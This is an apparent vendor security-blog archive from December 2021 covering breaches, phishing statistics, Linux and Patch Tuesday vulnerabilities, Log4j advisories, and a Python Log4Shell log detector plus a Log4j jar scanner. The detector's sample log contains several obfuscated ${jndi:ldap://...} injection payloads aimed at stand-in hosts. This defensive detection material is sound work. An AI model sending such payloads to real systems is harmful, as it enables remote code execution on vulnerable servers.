Monthly Archives

December 2021


Recent Attacks, Threats, and Breaches

Posted in News


There are so many breaches and attacks these days, that it is hard to keep up. Here are a few of the recent highlights:

1. Panasonic Breach

Panasonic is the latest high-profile victim of cybercriminals. It released a statement that it had suffered a breach of its network and that some data had been accessed during an intrusion.

The company says it contained the breach and enacted countermeasures successfully, but the investigation is ongoing and the full extent of the damage is not yet known. Some outlets reported that the breach began in early summer; if so, we could soon be hearing more about how deeply the attackers infiltrated Panasonic systems.

2. New Phishing Report

No matter how much phishing is reported and how much security awareness training is done, it seems there is always someone willing to click a dubious link or open a dubious attachment. Terranova Security’s 2021 Phishing Benchmark Global Report found:

  • 8% of those surveyed fail to spot nefarious emails
  • Education, Finance and Insurance, and IT had the highest click rates, all over 25%
  • Healthcare, Transport, and Consumer Product all kept their click rates under 10%
  • Overall, more than 50% of those who clicked a phishing link went on to download the malicious file.
  • IT had the highest click-to-download ratio of any industry: 84% of those who clicked the initial phishing link eventually downloaded the malware file.
  • The United States fared better overall, with an 8.7% click rate and a 40.9% click-to-download rate.
  • Canada had a 14.1% click rate and a 59.8% click-to-download rate.
  • 8% of North American employees would fall victim to a phishing email if they received one today.

3. Vulnerabilities Increase for Fifth Straight Year

According to the US-CERT Vulnerability Database, the United States set a new record for disclosed security vulnerabilities in 2021, the fifth consecutive year with a new annual high. As of December 8, 2021, 18,376 vulnerabilities had been recorded in production code.

The good news is that fewer high-severity vulnerabilities were found compared to 2020.

Conclusions Drawn

With high-profile companies continually being the subject of security breach headlines, phishing and ransomware on a definite increase, and the number of vulnerabilities rising, these are not happy times for the security space.

While there are many remedial actions that can and must be taken, the best defense is to prevent a breach from happening in the first place. The single most effective action that IT can take is to be diligent in installing patches. And that’s where Syxsense comes in.

Syxsense takes care of:

  • Patch distribution: sending the right patches to the right devices rapidly.
  • Patch supersedence: automatically ignoring older patches that are included as part of a newer release.
  • Eliminating network overload: If you push Microsoft Office patches out to 300 machines simultaneously, it can stall the network due to the quantity of data involved. Intelligent management platforms send the patch across the wire once to be shared peer-to-peer within the network.
  • Mobile devices returning to the office: The system detects their presence, quarantines the devices, checks for compliance, and remediates any issues before allowing them back onto the network.
  • Patch approval: Some organizations require various points of approval before patches are released. Good management tools make it easy to set this up once, after which it is applied automatically as part of the patching process.
  • Audits: Integrated management of vulnerability scanning and patch remediation simplifies the task of gathering up information for audits via drag and drop capabilities.
  • Patch roll back: If a patch caused an issue, it should be a simple matter to roll it back without IT jumping through hoops.
  • Threat alerts: Intelligent management sifts through enormous volumes of log entries and narrows threats down to the handful requiring urgent attention.
Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

Linux Vulnerabilities of the Week: December 20, 2021

Posted in News

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. Apache Log4j logging library vulnerability

Severity: Critical         CVSS Score: 10.0

This is a flaw in Apache Log4j 2. The JNDI features used in configuration, log messages and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints, so an attacker who can control log messages or log message parameters can execute arbitrary code loaded from an attacker-controlled LDAP server when message lookup substitution is enabled. In practice any string that ends up in a log line (an HTTP User-Agent, a username, a form field) is a potential injection point.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as it can be exposed over any network, with low complexity, no privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point: the exploited JVM acts on resources beyond Log4j's own security scope.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-44228
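The mechanism described above, lookup substitution inside a logged string, is also what a defender can hunt for in web-server and application logs. The detector below is an added example, not part of the original post and not Syxsense code. It URL-decodes each line, evaluates the lower/upper/date/default-value lookups that attackers nest to disguise the word "jndi", and reports the normalized ${jndi:...} payload. The access-log lines are constructed for the demonstration and use documentation IP ranges.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup payloads in log lines.

Added example, not Syxsense code. Attackers rarely send a plain
"${jndi:ldap://...}": they nest other Log4j lookups so the word "jndi"
is only assembled at evaluation time. This detector evaluates those
nesting tricks the way Log4j would, then looks for the result.
"""
import re
from urllib.parse import unquote

# A ${...} with no further ${ inside it: the innermost lookup, evaluated first.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(expr):
    """Evaluate the lookups used purely to spell 'jndi' indirectly."""
    head, sep, rest = expr.partition(":")
    kind = head.strip().lower()
    if ":-" in expr:                        # ${env:NOPE:-j} and ${::-j} -> "j"
        return expr.split(":-", 1)[1]
    if kind in ("lower", "upper") and sep:  # ${lower:J} -> "J" (case ignored later)
        return rest
    if kind == "date" and sep:              # ${date:'j'} -> "j"
        return rest.strip("'")
    # Unknown lookup (sys:, hostName, ...): keep its text, drop the braces, so
    # "${jndi:ldap://${hostName}.evil/a}" still collapses to a jndi lookup.
    return rest if sep else expr


def find_jndi(line):
    """Return the de-obfuscated ${jndi:...} payload in `line`, or None."""
    text = unquote(unquote(line))           # %2524 -> %24 -> "$" (double encoding)
    for _ in range(text.count("${") + 1):   # each pass removes one lookup
        m = INNERMOST.search(text)
        if m is None:
            return None
        expr = m.group(1)
        if expr.strip().lower().startswith("jndi:"):
            target = expr.strip()[5:].strip()
            return "${jndi:" + target + "}"
        text = text[:m.start()] + _resolve(expr) + text[m.end():]
    return None


def scan(lines):
    """Return [(line_number, payload)] for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        payload = find_jndi(line)
        if payload:
            hits.append((number, payload))
    return hits


# Constructed access-log lines (not real traffic); 198.51.100.0/24 is a
# documentation range. Lines 3-7 carry payloads, lines 1-2 must not match.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:22:01:13 +0000] "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:22:01:14 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 3310 "curl/7.68.0"',
    '198.51.100.5 - - [10/Dec/2021:22:02:01 +0000] "GET / HTTP/1.1" 200 512 "${jndi:ldap://198.51.100.5:1389/a}"',
    '198.51.100.6 - - [10/Dec/2021:22:02:02 +0000] "GET / HTTP/1.1" 200 512 "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.6/x}"',
    '198.51.100.7 - - [10/Dec/2021:22:02:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%2Fo%7D HTTP/1.1" 200 512 "-"',
    '198.51.100.8 - - [10/Dec/2021:22:02:04 +0000] "GET / HTTP/1.1" 200 512 "${jndi:ldap://${hostName}.evil.example/a}"',
    '198.51.100.9 - - [10/Dec/2021:22:02:05 +0000] "GET / HTTP/1.1" 200 512 "${${env:NOPE:-j}ndi${env:NOPE:-:}ldap://198.51.100.9/a}"',
]

if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

Run it over real access logs with `scan(open(path).read().splitlines())`. A string-match on "jndi" alone misses four of the five payloads above and flags the harmless "/docs/jndi-tutorial" line; evaluating the nesting first is what makes the match meaningful.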

2. Java logging library Apache Log4j (version 1.x) flaw affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 8.1

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. By supplying the TopicBindingName and TopicConnectionFactoryBindingName settings, the attacker makes JMSAppender perform JNDI requests that result in remote code execution, in the same fashion as CVE-2021-44228. The issue only affects deployments specifically configured to use JMSAppender, which is not the default. Log4j 1.x reached end of life in 2015 and receives no upstream fixes: apply the distribution's mitigation or remove the JMSAppender class from the jar, and plan the migration off 1.x.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-4104

3. STARTTLS session encryption bypassing in Fetchmail (< 6.4.22) affecting Red Hat Enterprise Linux 8

Severity: Medium       CVSS Score: 5.9

Fetchmail before 6.4.22 fails to enforce STARTTLS session encryption in some circumstances, such as a certain situation with IMAP and PREAUTH, so a connection the user believes has been upgraded to TLS can continue in plaintext. Where the server offers implicit TLS (IMAPS on port 993, POP3S on port 995), configuring fetchmail's ssl option avoids the STARTTLS upgrade path altogether.

The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack to be exploited, it can be exposed over any network, without privileges and user interaction.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-39272

4. RESTEasy (<4.6.0.Final) vulnerability

Severity: Medium       CVSS Score: 5.3

This is a flaw in all versions of RESTEasy up to 4.6.0.Final. The endpoint class and method names are returned as part of the exception response when RESTEasy cannot convert one of the request URI path or query values to the matching JAX-RS resource method’s parameter value. The highest threat from this vulnerability is to data confidentiality.

Syxscore Risk Alert

This vulnerability has a moderate risk as this can be exposed over any network, with low complexity, low privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-20289


Watch the Webcast: December Patch Tuesday 2021

Posted in Patch Management, Patch Tuesday

Watch this week's webcast to hear IT industry experts discuss strategies for tackling Microsoft's December Patch Tuesday updates.

December Patch Tuesday 2021

What’s your December patch strategy?

Our webcast will show you how to prioritize the latest updates for this month’s Microsoft Patch Tuesday. We’ll do a deep dive into each of the bulletins and show you how to navigate the risks of newly-identified vulnerabilities.

Our team of IT management experts has deployed over 100 million patches. Watch our free webinar to get industry-leading patch management strategies delivered right to your desk.

View the Webcast

What You Need to Know: December Patch Tuesday


December Patch Tuesday 2021 Resolves 67 Vulnerabilities

Posted in News, Patch Management, Patch Tuesday

December Patch Tuesday has arrived with 67 security gaps remediated, including one vulnerability that is already weaponized.

December Patch Tuesday Arrives with 67 Fixes

There are 7 Critical (one more than last month) and 60 Important fixes in this release.  Updates were included for Microsoft Windows and Windows Components, ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management and Windows Remote Access.

Year 2 Extended Security Updates: Windows 7 and Windows Server 2008 (including R2) received updates this month. Organizations still running Windows 7 or Server 2008 will soon need to decide on the third and final year of ESU.

Robert Brown, Head of Customer Success for Syxsense, said, “There are many extremely high risk vulnerabilities this month, with one being weaponized. Six other vulnerabilities are Publicly Aware, meaning the exact method to exploit is public knowledge, and with some of these being recognized by Microsoft as Exploit More Likely, this is not what our customers want to hear going into the end of year and Holiday Season.”

 

Top December Patches and Vulnerabilities

Based on the Vendor Severity & CVSS Score, we have made a few recommendations below.  As usual we recommend our customers enter the CVE numbers below into your Patch Management solution and deploy as soon as possible.

1. CVE-2021-43890: Windows AppX Installer Spoofing Vulnerability

This spoofing vulnerability in the Windows AppX Installer has been used in attacks associated with the Emotet/TrickBot/BazaLoader family. The attacker crafts a malicious package or attachment that appears legitimate and, typically through phishing, convinces the user to open it, which installs the attacker's code. Microsoft's published countermeasure is to disable the ms-appinstaller protocol handler (the "Enable App Installer ms-appinstaller protocol" Group Policy setting) until the update is deployed.

Syxscore

  • Vendor Severity: Important
  • CVSS: 7.1
  • Weaponized: Yes
  • Public Aware: Yes
  • Countermeasure: Yes

 Syxscore Risk

    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges: Low
    • User Interaction: Required
    • Scope (Jump Point): No

2. CVE-2021-43905: Microsoft Office App Remote Code Execution Vulnerability

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system. A remote attacker can send a specially-crafted request and execute arbitrary code on the target system because of an improper input validation in Microsoft Office app.

Microsoft has rated this vulnerability Exploitation More Likely. Because the Scope is Changed (a Jump Point), a successful exploit can affect resources beyond the Office app itself, reaching into the OS and other components. This is an extremely serious vulnerability to resolve.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 9.6
  • Weaponized: No
  • Public Aware: No
  • Countermeasure: No 

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges: None
  • User Interaction: Required
  • Scope (Jump Point): Yes

3. CVE-2021-43217: Windows Encrypting File System (EFS) Remote Code Execution Vulnerability

The vulnerability exists due to a boundary error when processing untrusted input in the Windows Encrypting File System (EFS). EFS provides an additional level of security for files and directories: cryptographic protection of individual files on NTFS volumes using a public-key system. A remote attacker can trigger an out-of-bounds write and execute arbitrary code on the target system.

Syxscore

  • Vendor Severity: Critical
  • CVSS: 8.1
  • Weaponized: No
  • Public Aware: Yes
  • Countermeasure: No

Syxscore Risk

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges: None
  • User Interaction: None
  • Scope (Jump Point): No

Syxsense Recommendations

Based on the Vendor Severity and CVSS Score, we have made a few recommendations below which you should prioritize this month; please pay close attention to any of these which are Publicly Aware and / or Weaponized.

| CVE Reference | Description | Vendor Severity | CVSS Score | Weaponized | Public Aware | Countermeasure | Highest Priority |
|---|---|---|---|---|---|---|---|
| CVE-2021-43890 | Windows AppX Installer Spoofing Vulnerability | Important | 7.1 | Yes | Yes | Yes | Yes |
| CVE-2021-43240 | NTFS Set Short Name Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | No | Yes |
| CVE-2021-41333 | Windows Print Spooler Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | No | Yes |
| CVE-2021-43893 | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | Important | 7.5 | No | Yes | No | Yes |
| CVE-2021-43883 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.1 | No | Yes | No | Yes |
| CVE-2021-43880 | Windows Mobile Device Management Elevation of Privilege Vulnerability | Important | 5.5 | No | Yes | No | Yes |
| CVE-2021-43215 | iSNS Server Remote Code Execution Vulnerability | Critical | 9.8 | No | No | No | Yes |
| CVE-2021-43899 | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | Critical | 9.8 | No | No | No | Yes |
| CVE-2021-43907 | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | Critical | 9.8 | No | No | No | Yes |
| CVE-2021-43905 | Microsoft Office app Remote Code Execution Vulnerability | Critical | 9.6 | No | No | No | Yes |
| CVE-2021-43882 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 9.0 | No | No | No | Yes |
| CVE-2021-41365 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42311 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42313 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42314 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42315 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42309 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 8.8 | No | No | No | Yes |
| CVE-2021-42310 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Critical | 8.1 | No | No | No | Yes |
| CVE-2021-43217 | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | Critical | 8.1 | No | No | No | Yes |
| CVE-2021-42320 | Microsoft SharePoint Server Spoofing Vulnerability | Important | 8.0 | No | No | No | Yes |
| CVE-2021-43233 | Remote Desktop Client Remote Code Execution Vulnerability | Critical | 7.0 | No | No | No | Yes |
| CVE-2021-43877 | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-40452 | HEVC Video Extensions Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-40453 | HEVC Video Extensions Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-41360 | HEVC Video Extensions Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-42312 | Microsoft Defender for IoT Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43256 | Microsoft Excel Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43875 | Microsoft Office Graphics Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43891 | Visual Studio Code Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43214 | Web Media Extensions Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43207 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43226 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43248 | Windows Digital Media Receiver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43245 | Windows Digital TV Tuner Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43232 | Windows Event Tracing Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43234 | Windows Fax Service Remote Code Execution Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-40441 | Windows Media Center Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43229 | Windows NTFS Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43230 | Windows NTFS Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43231 | Windows NTFS Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43223 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43238 | Windows Remote Access Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43237 | Windows Setup Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43247 | Windows TCP/IP Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | No | |
| CVE-2021-43242 | Microsoft SharePoint Server Spoofing Vulnerability | Important | 7.6 | No | No | No | |
| CVE-2021-43225 | Bot Framework SDK Remote Code Execution Vulnerability | Important | 7.5 | No | No | No | |
| CVE-2021-43888 | Microsoft Defender for IoT Information Disclosure Vulnerability | Important | 7.5 | No | No | No | |
| CVE-2021-43222 | Microsoft Message Queuing Information Disclosure Vulnerability | Important | 7.5 | No | No | No | |
| CVE-2021-43236 | Microsoft Message Queuing Information Disclosure Vulnerability | Important | 7.5 | No | No | No | |
| CVE-2021-43228 | SymCrypt Denial of Service Vulnerability | Important | 7.5 | No | No | No | |
| CVE-2021-43219 | DirectX Graphics Kernel File Denial of Service Vulnerability | Important | 7.4 | No | No | No | |
| CVE-2021-43889 | Microsoft Defender for IoT Remote Code Execution Vulnerability | Important | 7.2 | No | No | No | |
| CVE-2021-42294 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 7.2 | No | No | No | |
| CVE-2021-43892 | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | Important | 7.1 | No | No | No | |
| CVE-2021-43239 | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | Important | 7.1 | No | No | No | |
| CVE-2021-42293 | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | Important | 6.5 | No | No | No | |
| CVE-2021-43216 | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | Important | 6.5 | No | No | No | |
| CVE-2021-43244 | Windows Kernel Information Disclosure Vulnerability | Important | 6.5 | No | No | No | |
| CVE-2021-43246 | Windows Hyper-V Denial of Service Vulnerability | Important | 5.6 | No | No | No | |
| CVE-2021-43255 | Microsoft Office Trust Center Spoofing Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43896 | Microsoft PowerShell Spoofing Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43227 | Storage Spaces Controller Information Disclosure Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43235 | Storage Spaces Controller Information Disclosure Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-42295 | Visual Basic for Applications Information Disclosure Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43243 | VP9 Video Extensions Information Disclosure Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43224 | Windows Common Log File System Driver Information Disclosure Vulnerability | Important | 5.5 | No | No | No | |
| CVE-2021-43908 | Visual Studio Code Spoofing Vulnerability | Important | N/A | No | | | |

Log4j | Weaponized Threat

Posted in Patch Management

A vulnerability in Log4j which is a very popular Java-based logging tool has been weaponized. The threat is impacting millions.

Extremely Dangerous Vulnerability Discovered

This weekend a vulnerability in Log4j, a very popular Java-based logging library, was weaponized. Log4j 2 versions 2.0-beta9 through 2.14.1 are affected; 2.15.0 is the first release with the fix, and later 2.x releases closed follow-on issues, so deploy the latest 2.x available for your Java version. Log4j is a library, not a standalone product: any application that bundles it for logging is also exposed, and in those cases the application vendor has to ship the update.

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

What makes this extra serious is that the Scope (we call it a Jump Point) is Changed, meaning that exploitation of this vulnerability could allow the attacker to affect resources beyond the security scope managed by the security authority of the vulnerable component.

CVE-2021-44228 – CVSS Score: 10

Syxsense Risk Alert 

    • Attack Vector: Any Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope (Jump Point): Yes

As always, we recommend full testing be performed prior to live deployment. The relevant updates are now available within Syxsense.
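Because Log4j ships inside other vendors' applications, the first job is finding every copy on disk. The scanner below is an added example, not Syxsense code and not part of the original post. It covers both CVEs discussed in these posts: for Log4j 2 it reads the library version from the Maven pom.properties inside each jar and checks whether JndiLookup.class is still present (CVE-2021-44228); for Log4j 1.x it checks for JMSAppender.class (CVE-2021-4104). It recurses into jars nested inside WAR and EAR files. The sample deployment it scans is constructed in a temporary directory so the example runs offline.

```python
"""Inventory Log4j exposure inside JAR/WAR/EAR files on disk.

Added example, not Syxsense code. It opens each archive (recursing into
archives nested inside WARs and EARs), reads the Maven pom.properties that
log4j-core (2.x) and log4j (1.x) ship with, and checks for the classes
behind CVE-2021-44228 (JndiLookup) and CVE-2021-4104 (JMSAppender).
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

LOG4J2_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_PROPS = "META-INF/maven/log4j/log4j/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JMS_APPENDER = "org/apache/log4j/net/JMSAppender.class"
FIXED_2X = (2, 15, 0)          # first log4j-core release with the CVE-2021-44228 fix
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(props_text):
    """Pull 'version=2.14.1' out of pom.properties as a comparable tuple.
    Pre-release tags collapse into the patch field ('2.0-beta9' -> (2, 0, 9));
    every 2.0 pre-release is below 2.15.0, so the comparison still holds."""
    m = re.search(r"^version=(.+)$", props_text, re.MULTILINE)
    if not m:
        return None
    nums = [int(x) for x in re.findall(r"\d+", m.group(1))]
    return tuple((nums + [0, 0, 0])[:3])


def scan_archive(zf, label, findings):
    names = set(zf.namelist())
    if LOG4J2_PROPS in names:
        ver = parse_version(zf.read(LOG4J2_PROPS).decode("utf-8", "replace"))
        if ver and ver < FIXED_2X:
            if JNDI_LOOKUP in names:
                findings.append((label, "log4j-core", ver, "CVE-2021-44228: upgrade to the latest 2.x"))
            else:
                findings.append((label, "log4j-core", ver, "JndiLookup.class removed: mitigated, upgrade anyway"))
    if LOG4J1_PROPS in names and JMS_APPENDER in names:
        ver = parse_version(zf.read(LOG4J1_PROPS).decode("utf-8", "replace"))
        findings.append((label, "log4j 1.x", ver,
                         "CVE-2021-4104: exploitable if JMSAppender is configured; 1.x is end-of-life"))
    for name in names:                      # WAR/EAR files bundle their own jars
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            scan_archive(nested, f"{label}!{name}", findings)
    return findings


def scan_tree(root):
    """Scan every archive under `root`; labels are paths relative to root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    scan_archive(zf, path.relative_to(root).as_posix(), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _jar(entries):
    """Build an in-memory archive from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed sample deployment: a vulnerable, a stripped and a fixed
    log4j-core, a WAR bundling log4j 1.2.17 with JMSAppender, one unrelated jar."""
    lib = Path(root) / "lib"
    lib.mkdir(parents=True)
    (lib / "log4j-core-2.14.1.jar").write_bytes(_jar({LOG4J2_PROPS: b"version=2.14.1\n", JNDI_LOOKUP: b""}))
    (lib / "log4j-core-2.14.1-stripped.jar").write_bytes(_jar({LOG4J2_PROPS: b"version=2.14.1\n"}))
    (lib / "log4j-core-2.17.0.jar").write_bytes(_jar({LOG4J2_PROPS: b"version=2.17.0\n", JNDI_LOOKUP: b""}))
    (lib / "unrelated.jar").write_bytes(_jar({"com/example/App.class": b""}))
    legacy = _jar({LOG4J1_PROPS: b"version=1.2.17\n", JMS_APPENDER: b""})
    (Path(root) / "legacy.war").write_bytes(_jar({"WEB-INF/lib/log4j-1.2.17.jar": legacy}))


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for label, lib, ver, note in demo():
        print(f"{label}: {lib} {'.'.join(map(str, ver))} -> {note}")
```

Point `scan_tree()` at an application root (or `/` on a server) instead of the constructed tree to produce a real inventory. It does not catch shaded or repackaged copies whose pom.properties has been renamed, and it says nothing about whether a 1.x deployment actually configures JMSAppender, so treat its output as a worklist rather than a clean bill of health.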

How to Protect Your Business from Log4j

Although a number of popular IT management and security tools are vulnerable, Syxsense is pleased to confirm that it does NOT use Log4j. Syxsense Secure and Enterprise customers can use the Syxsense security scanner to identify endpoints that are exposed to this new vulnerability.

Syxsense vulnerability scanner is not only a complete security management package, it is automated, repeatable, and generates quick results, delivering security and safety in a timely manner. With security scanning and patch management in one console, Syxsense Secure is the only product that not only shows you what’s wrong, but also deploys the solution.

It offers visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience. And it is fully integrated with automated patch management software that lets you easily manage unpatched vulnerabilities with the click of a button.

Syxsense includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.


Linux Vulnerabilities of the Week: December 6, 2021

Posted in News

See this week's top Linux issues and keep your IT environment protected from the latest December Linux vulnerabilities.

1. CSRF token bypass in Mailman (<2.1.38)

Severity: Important    CVSS Score: 8.8

A Cross-Site Request Forgery (CSRF) attack can be performed in GNU Mailman due to a CSRF token bypass.

The CSRF token is not bound to the type of user it was issued to. In Mailman before 2.1.38, a list member or moderator can obtain a token and craft an admin request carrying that token; if a list admin is tricked into submitting it, the request passes the CSRF check and can set a new admin password or make other changes.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as though it requires user interaction, this can be exposed over any network, with low complexity, and without privileges.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-44227

2. Xen PoD Operation denial of service

Severity: Important    CVSS Score: 8.8

PoD operations on misaligned GFNs (Xen advisory XSA-388, covering three CVEs). x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages).

The implementation of some of these hypercalls for PoD does not enforce the base page frame number to be suitably aligned for the specified order, yet some code involved in PoD handling actually makes such an assumption. These operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain (the first patch fixes both issues). In addition, handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708, second patch).

Syxscore Risk Alert

This vulnerability has a major risk as although it requires local access (code running in a guest or in a domain that controls one), it can be exploited with a low-complexity attack, low privileges, and without user interaction. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point: a single guest can crash the hypervisor and every other guest on the host.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-28704, CVE-2021-28707, CVE-2021-28708

3. Insufficient symlink protection in the Node.js ‘tar’ package (node-tar)

Severity: Important    CVSS Score: 8.6

This is a flaw in the npm package “tar” (aka node-tar). Extracting tar files that contain both a directory and a symlink with the same name, where the symlink and directory names in the archive entry used backslashes as a path separator, made it possible to bypass node-tar symlink checks on directories.

